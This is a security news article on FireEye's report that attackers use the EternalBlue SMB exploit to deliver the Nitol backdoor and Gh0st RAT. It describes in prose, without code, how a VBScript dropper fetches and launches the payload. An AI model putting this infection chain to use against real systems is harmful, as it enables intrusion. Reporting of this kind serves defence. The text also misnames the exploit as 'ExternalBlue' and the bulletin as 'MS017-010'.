ExternalBlue, the exploit used in the WannaCry ransomware outbreak, is now being leveraged to distribute the Nitol backdoor and Gh0st RAT malware.
Security researchers at FireEye said, just as WannaCry criminals did, threat actors are leveraging the same Microsoft Server Message Block (SMB) protocol vulnerability (MS017-010).
“We observed lab machines vulnerable to the SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine,” wrote co-authors Ali Islam, Christopher Glyer and Barry Vengerik in a FireEye report posted Friday.
Gh0st RAT is a Trojan that has targeted the Windows platform for years. It has pimarily been a nation-state tool used in APT attacks against government agencies, activists and other political targets. Gh0st recently made headlines when instances of the RAT were found by the Shodan tool called Malware Hunter, a new crawler designed to find command and control servers.
According to FireEye, Backdoor.Nitol has been linked to campaigns involving a remote code execution vulnerability using the ADODB.Stream ActiveX Object that affects older versions of Internet Explorer. In the past, Backdoor.Nitol and Gh0st have also been delivered via exploitation of the CVE-2014-6332 vulnerability and in spam campaigns that target PowerShell commands, researchers said.
“The initial exploit technique used at the SMB level (by Backdoor.Nitol and Gh0st) is similar to what we have been seen in WannaCry campaigns; however, once a machine is successfully infected, this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server,” researchers wrote.
Researchers said they have seen the same EternalBlue and VBScript combination used to distribute Gh0st RAT in Singapore and Backdoor.Nitol in the South Asia region.
The analysis of how Backdoor.Nitol and Gh0st exploit Windows follows the threat actors behind WannaCry – attackers send specially crafted messages to a Microsoft SMBv1 server.
“The attacker echoes instructions into a new ‘1.vbs’ file to be executed later. These instructions fetch the payload ‘taskmgr.exe’ from another server in a synchronous call. This action creates an ActiveX object ADODB.Stream, which allows reading the file coming from the server and writes the result of the binary data in a stream,” researchers said.
Ultimately, “the ‘1.vbs’ executes through a command-line version of the Windows Script Host which deletes the vbs file. Once the executable is fetched and saved, the attacker uses a shell to launch the backdoor from the saved location,” researchers said. Next, the Nitol or Gh0st RAT binary is downloaded.
“The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities. In the coming weeks and months, we expect to see more attackers leveraging these vulnerabilities and to spread such infections with different payloads,” researchers said.